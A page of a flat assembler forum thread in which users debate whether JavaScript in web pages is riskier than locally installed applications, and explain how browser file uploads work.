flat assembler
Message board for the users of flat assembler.

flat assembler > Heap > Why we should always disable JS (and flash)

Goto page Previous  1, 2, 3 ... 19, 20, 21, 22  Next
Author
Thread Post new topic Reply to topic
revolution
When all else fails, read the source


Joined: 24 Aug 2004
Posts: 16737
Location: In your JS exploiting you and your system
If the only way to use a service is to be forced to expose yourself and your system to increased risk then that service should die IMO. Remote services have no right require everyone to bend to their will. They should be grateful we give them our attention, not demanding that we comply to their desires.

It used to be that something as simple as a messenger program could be used to communicate with others over public protocols. But now that is all disappearing. The companies have taken over and closed all the protocols and force people to use only their code/app to access only their systems, with everything logged and recorded.
Post 07 Jun 2019, 16:35
View user's profile Send private message Visit poster's website Reply with quote
DimonSoft



Joined: 03 Mar 2010
Posts: 571
Location: Belarus
revolution wrote:
The difference is still not mentioned. With a VM the user decides when new code is allowed to run by installing a new version. A version that comes from a trusted source, probably with SHA hashes, and a well known publisher.. Probably on a schedule of not more than a few times per year, or maybe never updating.

Nothing different, except that “SHA hashes” are checked automatically by the browser. What prevents an attacker who is able to replace an application in a trusted source with a rogue version from also changing the piece of text of the webpage to show the new SHA hash for the rogue version? What is the purpose?

Quote:
(see the previous link I gave)

… where the problem is not caused by JavaScript. How does a piece of text written with a certain syntax differ from any other document?

Quote:
Someone with a native app in a VM only cares about a few apps total, from a dew devs, doing limited and wanted functions. A firewall policy can catch a lot of bad behaviour, and the user can talk to the dev about any concerns.

So what? Access the websites with JS enabled with a browser in a VM. NO DIFFERENCE. Point.

Quote:
How do you filter at the firewall a browser that goes to so many different domains?

Only those the server allowed to send data to. If you use the service they already have your data and could have sent it to any domain they wish whenever they wish. JS can only send data to a small subset of servers that are specified as trusted by the server which is the source of the page.

Quote:
How would you limit it to actions only the user desires?

It is limited, unless you know nothing about its limitations. Those that sometimes cause web application developers to spend much time looking for alternative solutions to their tasks so they do not face the limitations of JS.
Post 07 Jun 2019, 21:37
View user's profile Send private message Visit poster's website Reply with quote
revolution
When all else fails, read the source


Joined: 24 Aug 2004
Posts: 16737
Location: In your JS exploiting you and your system
Do you really think that an app that I deliberately download and want, and some random code a website delivers to me, are the same thing? Clearly I can't seem to explain the difference.

fasm is a great example of code that that I find desirable, so I download it and use it. It doesn't need any network communication so it is blocked by default in the firewall since I never felt the need to explicitly enable it. And one day if I find the firewall log shows that fasm has been blocked from communicating then I will know something is very wrong. I can then talk to the developer, or delete it, or edit the code, or go back to an older version, or whatever I please.

If fasm was an online only assembler, then what? How can I know what it is doing? I can't block the browser at the firewall to stop data leakage since it would require the browser. It might be capturing my clipboard and sending sensitive data to unknown places. I wouldn't know and couldn't check. I wouldn't know which version I was running, I wouldn't even know if the JS I was given is the same as other people are getting. And where is all the code I write stored? In which country under which laws? Who gets to see it? Is it enabling the microphone or camera? Is it trying to exploit a rowhammer attack hoping I have an old unpatched OS? Is it mining for bitcoins in the background? What about when I'm in a place with no Internet, then I can't use it. Is the server secure, or under attack and delivering rogue code to people?

I'm not sure that can be considered the same thing. Those are very different situations.
Post 07 Jun 2019, 22:07
View user's profile Send private message Visit poster's website Reply with quote
DimonSoft



Joined: 03 Mar 2010
Posts: 571
Location: Belarus
revolution wrote:
fasm is a great example of code that that I find desirable, so I download it and use it. It doesn't need any network communication so it is blocked by default in the firewall since I never felt the need to explicitly enable it. And one day if I find the firewall log shows that fasm has been blocked from communicating then I will know something is very wrong. I can then talk to the developer, or delete it, or edit the code, or go back to an older version, or whatever I please.

If fasm was an online only assembler, then what? How can I know what it is doing? I can't block the browser at the firewall to stop data leakage since it would require the browser.

So, the problem is when an application requires internet connection.

revolution wrote:
It might be capturing my clipboard and sending sensitive data to unknown places.

If ANY application requires internet connection it can do so. Not a JS problem.

Quote:
I wouldn't know and couldn't check.

You could but it would have required sniffing packets and stuff. Just like with any other network-related application. Not a JS problem.

Quote:
I wouldn't know which version I was running, I wouldn't even know if the JS I was given is the same as other people are getting.

It’s not version that matters, what the particular implementation that you get does is what matters. People download fasm of different versions and the one you use might not be the same as mine due to the difference in the time we’ve downloaded them.

Quote:
And where is all the code I write stored? In which country under which laws? Who gets to see it?

Nothing changes when the application uses plain HTTP without a single JS line. Not a JS problem.

Quote:
Is it enabling the microphone or camera?

Unlike desktop applications, web browsers do show notification of web camera and/or microphone usage. With desktop applications you can only rely on a LED being present nearby your camera and usually no luck detecting microphone usage without explicitly opening the microphone parameters or something like that. Not a JS problem.

Quote:
Is it trying to exploit a rowhammer attack hoping I have an old unpatched OS?

You can’t be sure for any application except maybe your own ones. But then again Thompson’s hack. Doing so from JS is much harder. Not a JS problem.

Quote:
Is it mining for bitcoins in the background?

You can guess from the CPU usage. The same for any other type of applications. Miners are also more efficient when run as native applications (and they tend to be implemented as such), not as JS scripts. Not a JS problem.

revolution wrote:
What about when I'm in a place with no Internet, then I can't use it.

What if I use a sound recorder and have no microphone? JS itself works without network connection. Two unrelated requirements. Not a JS problem.

Quote:
Is the server secure, or under attack and delivering rogue code to people?

How do you tell it downloading applications and checking hashes? An attacker that has control over the server can not only replace the file but also replace the hash info. Not a JS problem.

I can’t believe I had to write that again.
Post 08 Jun 2019, 06:10
View user's profile Send private message Visit poster's website Reply with quote
revolution
When all else fails, read the source


Joined: 24 Aug 2004
Posts: 16737
Location: In your JS exploiting you and your system
So you would suggest that the fasm code has the same probability to cause us harm and some random website delivering JS? I can't believe the risks are the same, or even close to the same. Indeed the risks are vastly different, and perhaps the is the important thing that you seem to have missed.

Walking a tightrope isn't a problem. You could still easily die in your home by accidentally slipping. So we might as well walk the high-wires everywhere. Both can kill us, so they are the same thing.
Post 08 Jun 2019, 06:18
View user's profile Send private message Visit poster's website Reply with quote
Furs



Joined: 04 Mar 2016
Posts: 1429
DimonSoft wrote:
So, the problem is when an application requires internet connection.
Exactly this.

The real problem is that revolution compares Javascript web apps with offline apps, but by definition those are online. His issues apply to any app with an internet connection...
Post 08 Jun 2019, 11:58
View user's profile Send private message Reply with quote
guignol



Joined: 06 Dec 2008
Posts: 605
Location: /96A
I can't believe that either
any scripting language has to be robust
Post 08 Jun 2019, 12:23
View user's profile Send private message Reply with quote
sleepsleep



Joined: 05 Oct 2006
Posts: 8364
Location: ˛                             ⁣⁣⁣⁣⁣⁣⁣⁣⁣⁣⁣⁣⁣⁣⁣⁣⁣⁣⁣⁣⁣⁣⁣⁣⁣⁣⁣⁣⁣⁣⁣⁣⁣⁣⁣⁣⁣⁣⁣⁣⁣⁣⁣⁣Posts: 334455
I can firewall chrome, but doing so would render chrome becomes chromeless,

there is no different between data and code, it solely depends who going to parse them,

maybe this is a browser problem, we need browser with a custom js dll that dissable eval and friends, why not let us customize js,
Post 08 Jun 2019, 14:43
View user's profile Send private message Reply with quote
revolution
When all else fails, read the source


Joined: 24 Aug 2004
Posts: 16737
Location: In your JS exploiting you and your system
Furs wrote:
DimonSoft wrote:
So, the problem is when an application requires internet connection.
Exactly this.

The real problem is that revolution compares Javascript web apps with offline apps, but by definition those are online. His issues apply to any app with an internet connection...
His or her.

Certainly access to the Internet is a major part of the problem. And that is why JS is dangerous because you are expected to allow it access to the Internet so that it can download more JS code to do more things you aren't aware of.

And I think some people here perhaps still haven't understood the difference to some app that can be constrained locally. If it needs an Internet connection because of the nature of the app (it might be a communication program), then we can monitor its activities through the firewall. But if it is running in a browser that doesn't work anymore since everything is running under one process and gets mixed together, so its activities are obscured by other tabs and browser processes doing other things.

Do you know how many IP addresses you accessed today that ran embedded JS code? Probably many hundreds, or thousands, for the average user. Do you know how many of those were running "good" code? Do you know what they were all doing, or why they were doing it? Why do those sites have so much code running? Is it really all just to make fancy animated menus?
Post 08 Jun 2019, 16:31
View user's profile Send private message Visit poster's website Reply with quote
DimonSoft



Joined: 03 Mar 2010
Posts: 571
Location: Belarus
revolution wrote:
So you would suggest that the fasm code has the same probability to cause us harm and some random website delivering JS? I can't believe the risks are the same, or even close to the same. Indeed the risks are vastly different, and perhaps the is the important thing that you seem to have missed.

Not different at all if you compare a web-application (that requires internet access by definition) with a desktop application that requires internet access. If you compare a needle and an elephant then you can prove any of them is more dangerous.

revolution wrote:
Walking a tightrope isn't a problem. You could still easily die in your home by accidentally slipping. So we might as well walk the high-wires everywhere. Both can kill us, so they are the same thing.

A good reason to create a topic called “Why we should prohibit selling ropes” and to post messages about children choking on threads.

revolution wrote:
Certainly access to the Internet is a major part of the problem. And that is why JS is dangerous because you are expected to allow it access to the Internet so that it can download more JS code to do more things you aren't aware of.

“JS is dangerous because you’re expected to allow a web browser to access the Internet”. Cool! How does this differ from desktop applications that require Internet access but do not need JS? Not a JS problem.

revolution wrote:
And I think some people here perhaps still haven't understood the difference to some app that can be constrained locally. If it needs an Internet connection because of the nature of the app (it might be a communication program), then we can monitor its activities through the firewall. But if it is running in a browser that doesn't work anymore since everything is running under one process and gets mixed together, so its activities are obscured by other tabs and browser processes doing other things.

So, there’s no traffic monitor in your web browser, that’s the reason. I see. Just curious: is it IE4 or Arachne?

revolution wrote:
Do you know how many IP addresses you accessed today that ran embedded JS code?

No, and I don’t care since I know that it is well constrained by the rules imposed by the browser and, if the website owner having my data plays fair, nothing dangerous will happen.

revolution wrote:
Probably many hundreds, or thousands, for the average user. Do you know how many of those were running "good" code?

Doesn’t matter, since the code is limited to its own browser tab.

revolution wrote:
Do you know what they were all doing, or why they were doing it?

What about your desktop applications? Have you looked through every IP packet that crossed the boundary between your computer and the Internet? What about your phone?

revolution wrote:
Why do those sites have so much code running? Is it really all just to make fancy animated menus?

Open the Inspector and check it if you wish. Just like you open every application you’re going to run in a debugger.
Post 08 Jun 2019, 19:09
View user's profile Send private message Visit poster's website Reply with quote
revolution
When all else fails, read the source


Joined: 24 Aug 2004
Posts: 16737
Location: In your JS exploiting you and your system
How would you suggest that we protect ourselves from rogue websites, and bad webhosts?
Post 08 Jun 2019, 20:36
View user's profile Send private message Visit poster's website Reply with quote
DimonSoft



Joined: 03 Mar 2010
Posts: 571
Location: Belarus
revolution wrote:
How would you suggest that we protect ourselves from rogue websites, and bad webhosts?

Shutting down routers?
Post 09 Jun 2019, 20:45
View user's profile Send private message Visit poster's website Reply with quote
sts-q



Joined: 29 Nov 2018
Posts: 24
Hello! Smile

I just uploaded via firefox a file out of my private filesystem to some cloud server. I had to enter a password for this
cloud thing.

Can you link me to a discussion where is explained why other programs running inside my browser can not read files while this could?

I have no idea how this is guarantied, far less how save that may be. Question

greeting
sts-q
Post 18 Jun 2019, 04:06
View user's profile Send private message Visit poster's website Reply with quote
revolution
When all else fails, read the source


Joined: 24 Aug 2004
Posts: 16737
Location: In your JS exploiting you and your system
sts-q: Are you asking about the file selection box for uploading? Like with the "Add Attachment" button in the reply edit window for this board?

There is an HTML tag the allows the browser to send a file during a POST request. There is no requirement for JS to activate this, it is native HTML. But JS can intercept this tag and get access to files to process them.

As for any passwords, that would be for the cloud service side, not for your own machine.

For this board we have:
Code:
<input name="fileupload" style="width:320px" maxlength="2097152" value="" class="bginput" type="file">    
Post 18 Jun 2019, 07:44
View user's profile Send private message Visit poster's website Reply with quote
sts-q



Joined: 29 Nov 2018
Posts: 24
revolution: I accidentally sometimes click on a button and that way download something i did not want. Sourceforge is good at that. That way it's simple to get access to this functionality: give me picture that looks like as what i am looking for.

Now, the trick is, to know about my source-tree and file names to download -- in this case upload -- any readable file from my home pc to some advertisement provider coming from anywhere on this blue planet?

Right??? Or did i get it wrong???
Post 18 Jun 2019, 08:15
View user's profile Send private message Visit poster's website Reply with quote
revolution
When all else fails, read the source


Joined: 24 Aug 2004
Posts: 16737
Location: In your JS exploiting you and your system
sts-q: I'm not sure about your question.

Are you asking if JS can upload a file from your computer without your knowledge? Are you asking if JS can download a file to your computer without your knowledge?

In theory both of those should not be possible.without exploiting some bug somewhere.

But for both, you also have the complication that JS can show you false information in the status bar about where the link goes. Thus fooling you into clicking the wrong place. And JS can intercept files you want to upload and send them to other places you didn't explicitly allow. You would have to trust the website to be honest and not hacked to not be caught by both of those cases where JS takes over from the browser's inbuilt actions.
Post 18 Jun 2019, 08:34
View user's profile Send private message Visit poster's website Reply with quote
sts-q



Joined: 29 Nov 2018
Posts: 24
revolution wrote:

Are you asking if JS can upload a file from your computer without your knowledge? Are you asking if JS can download a file to your computer without your knowledge?


Can JS upload a file, providing a default path into my filesystem, so that i just and only need to click "Accept"?

I **believe** and **hope** the default, firefox comes up with, is remembered and done by firefox.


I realize, that i am pretty naive and ignorant about all this.


Last edited by sts-q on 18 Jun 2019, 12:16; edited 1 time in total
Post 18 Jun 2019, 11:12
View user's profile Send private message Visit poster's website Reply with quote
revolution
When all else fails, read the source


Joined: 24 Aug 2004
Posts: 16737
Location: In your JS exploiting you and your system
sts-q wrote:
Can JS upload a file, providing a default path into my filesystem, so that i just and only need to click "Accept"?
This shouldn't be possible. The browser requires you to select a file (usually with a "browse ..." button) and you will see the file selection dialog.
Post 18 Jun 2019, 11:46
View user's profile Send private message Visit poster's website Reply with quote
guignol



Joined: 06 Dec 2008
Posts: 605
Location: /96A
and how to add a smile on this board?
Post 18 Jun 2019, 16:38
View user's profile Send private message Reply with quote
sts-q



Joined: 29 Nov 2018
Posts: 24
click "Review" right bottom -- and smile
Post 18 Jun 2019, 17:30
View user's profile Send private message Visit poster's website Reply with quote
Display posts from previous:
Post new topic Reply to topic

Jump to:  
Goto page Previous  1, 2, 3 ... 19, 20, 21, 22  Next

< Last Thread | Next Thread >
Forum Rules:
You cannot post new topics in this forum
You cannot reply to topics in this forum
You cannot edit your posts in this forum
You cannot delete your posts in this forum
You cannot vote in polls in this forum
You can attach files in this forum
You can download files in this forum


Copyright © 1999-2019, Tomasz Grysztar.

Powered by rwasa.